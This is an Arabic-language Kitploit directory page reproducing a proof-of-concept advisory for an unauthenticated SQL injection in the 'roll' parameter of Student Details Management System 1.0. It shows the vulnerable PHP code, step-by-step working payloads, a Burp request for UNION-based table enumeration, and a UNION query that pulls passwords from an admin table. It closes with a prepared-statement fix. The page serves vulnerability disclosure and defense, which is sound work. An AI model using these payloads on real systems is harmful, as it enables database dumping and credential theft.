Skip to content
KitploitKITPLOIT
أدواتالمدونة
إرسال
أدواتالمدونة
إرسال

أدوات الاختراق واختبار الاختراق والأمن السيبراني لترسانتك الأمنية!

Kitploit هو دليل لأدوات الاختراق والأمن السيبراني واختبار الاختراق. اكتشف آخر تحديثات المشاريع للعثور على الثغرات وتحليل الأنظمة وأتمتة الاختبارات وتعزيز أمنك.

··الخلاصات·اتصال·الخصوصية·© 2026 Kitploit

دليل الأدوات

الفئات

عرض جميع الفئات
Loading categories
CVE-2026-10110-SQLi — إثبات مفهوم لثغرة حقن SQL غير مصادق عليها في نظام إدارة بيانات الطلاب الإصدار 1.0، مع توضيح استخراج البيانات القائم على UNION وسرقة بيانات الاعتماد. | Kitploit
أدوات/GitHubGitHub/xmyronn/cve-2026-10110-sqli
تحليل الثغرات الأمنيةالاستغلالاستغلال تطبيقات الويبأمن الويباختبار الاختراقأمن قواعد البيانات
GitHubxmyronn/cve-2026-10110-sqli

CVE-2026-10110-SQLi

إثبات مفهوم لثغرة حقن SQL غير مصادق عليها في نظام إدارة بيانات الطلاب الإصدار 1.0، مع توضيح استخراج البيانات القائم على UNION وسرقة بيانات الاعتماد.

عرض المستودع
منذ 3 أشهرلم تتم المراجعة بعد

الأكثر شعبية

عرض الكل →

اكتشف الأدوات الأكثر استخدامًا من قبل مجتمعنا.

استكشف جميع الأدوات

تصفح مجموعتنا من الأدوات

عرض جميع الأدوات →
مشاركة

نظام إدارة بيانات الطلاب 1.0 - حقن SQL (بدون مصادقة)

معلومات الثغرة

الحقلالتفاصيل
المنتجنظام إدارة بيانات الطلاب
البائعcode-projects.org
الإصدار1.0
نوع الثغرةحقن SQL (CWE-89)
معرف CVEقيد الانتظار
درجة CVSS9.8 حرجة (AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H)
المصادقة المطلوبةلا
الملف المتأثر/SMS/index.php
المعامل القابل للاستغلالroll (POST)

الوصف

توجد ثغرة حرجة في حقن SQL في ملف index.php الخاص بنظام إدارة بيانات الطلاب 1.0. يتم دمج معامل roll المرسل عبر طلب POST مباشرة في استعلام SQL خام دون أي تعقيم أو تحقق من صحة الإدخال أو استخدام عبارات مُعدّة مسبقًا. وهذا يسمح لمهاجم عن بُعد غير مصادق بحقن SQL تعسفي وتنفيذ استخراج بيانات قائم على UNION، مما يؤدي إلى تفريغ خادم قاعدة البيانات بالكامل بما في ذلك جداول بيانات الاعتماد.

توجد الثغرة في نموذج البحث عن الطلاب المواجه للجمهور، ولا تتطلب أي مصادقة.


الكود القابل للاستغلال

الملف: index.php (الأسطر 51–59)

root@kitploit:~
include('dbcon.php');
if (isset($_POST['show'])) {

    $Standard = $_POST['standard'];
    $RollNo = $_POST['roll'];

    $sql = "SELECT * FROM `student` WHERE `standard` = '$Standard' OR `rollno`='$RollNo'";

    $result = mysqli_query($conn,$sql);

يتم أخذ كل من $Standard و $RollNo مباشرة من $_POST دون أي تهريب أو معاملات. يتحكم المهاجم في معامل roll للخروج من سياق سلسلة SQL وحقن استعلامات تعسفية.


إثبات المفهوم

الخطوة 1 — تأكيد السلوك الطبيعي

انتقل إلى الصفحة الرئيسية للتطبيق وأدخل رقم لفة صحيح:

root@kitploit:~
http://<TARGET>/SMS/index.php

أدخل 1001 في حقل رقم اللفة ← يعيد التطبيق سجلات الطلاب بشكل طبيعي.

Screenshot 2026-05-03 220510

الخطوة 2 — تشغيل خطأ SQL (تأكيد نقطة الحقن)

أدخل علامة اقتباس مفردة ' في حقل رقم اللفة وانقر على SHOW INFO.

النتيجة: يلقي MariaDB خطأً فادحًا يكشف استعلام SQL الخام ومسار الملف:

root@kitploit:~
Fatal error: Uncaught mysqli_sql_exception: You have an error in your SQL syntax; 
check the manual that corresponds to your MariaDB server version for the right 
syntax to use near '"' at line 1 in 
C:\xampp\htdocs\STUDENT_DETAILS_MANAGEMENT_SYSTEM_IN_PHP_WITH_SOURCE_CODE\SMS\index.php:59
Screenshot 2026-05-03 220533

الخطوة 3 — تجاوز المصادقة / تفريغ الجدول الكامل

الحمولة:

root@kitploit:~
' or 1=1 -- -

النتيجة: يتم إرجاع جميع سجلات الطلاب في قاعدة البيانات دون أي رقم لفة صحيح، مما يؤكد أن الحقن قابل للاستغلال.

Screenshot 2026-05-03 220550

الخطوة 4 — الاستخراج القائم على UNION (تعداد قاعدة البيانات الكامل)

طلب Burp Suite:

root@kitploit:~
POST /STUDENT_DETAILS_MANAGEMENT_SYSTEM_IN_PHP_WITH_SOURCE_CODE/SMS/index.php HTTP/1.1
Host: 192.168.0.9
Content-Type: application/x-www-form-urlencoded

roll=1001' union select null,null,table_name,null,null,null,null from information_schema.tables -- -&standard=SELECT+STANDARD&show=SHOW+INFO

النتيجة: يعكس عمود name (الموضع 3 في UNION) كل اسم جدول عبر جميع قواعد البيانات في مثيل MySQL — بما في ذلك admin و global_priv و users و mysql.user وجداول بيانات الاعتماد من تطبيقات متعددة أخرى مثبتة على نفس مثيل XAMPP.

Screenshot 2026-05-03 220606

الخطوة 5 — مسار تصعيد الامتيازات

يكشف التفريغ عن جداول حساسة بما في ذلك admin و users و global_priv و tbl_admin من قواعد بيانات أخرى على نفس الخادم. يمكن للمهاجم استخراج بيانات الاعتماد باستخدام:

root@kitploit:~
roll=1' union select null,null,password,null,null,null,null from admin-- -

بالإضافة إلى إخراج الأخطاء التفصيلي (الخطوة 2)، يتم أيضًا تأكيد الكشف الكامل لمسار الملف:

root@kitploit:~
C:\xampp\htdocs\STUDENT_DETAILS_MANAGEMENT_SYSTEM_IN_PHP_WITH_SOURCE_CODE\SMS\index.php

التأثير

  • تعداد قاعدة البيانات الكامل عبر جميع قواعد البيانات على الخادم (وليس فقط التطبيق المستهدف)
  • استخراج بيانات اعتماد المسؤول عبر تفريغ جدول admin
  • الكشف الكامل للمسار عبر إخراج أخطاء SQL التفصيلي
  • لا تتطلب مصادقة — قابلة للاستغلال من قبل أي زائر غير مصادق لصفحة البحث
  • تصعيد امتيازات محتمل لتطبيقات أخرى تشارك نفس مثيل MySQL

المعالجة

استخدم عبارات مُعدّة مسبقًا مع معاملات مرتبطة:

root@kitploit:~
$stmt = $conn->prepare("SELECT * FROM `student` WHERE `standard` = ? OR `rollno` = ?");
$stmt->bind_param("ss", $Standard, $RollNo);
$stmt->execute();
$result = $stmt->get_result();

بالإضافة إلى ذلك، قم بتعطيل إخراج أخطاء PHP/MySQL التفصيلي في بيئة الإنتاج عن طريق ضبط display_errors = Off في php.ini.


المراجع

  • الصفحة الرئيسية للبائع
  • CWE-89: حقن SQL
  • OWASP حقن SQL

المكتشف

الباحث: Imad Alvi

تنزيل الأداة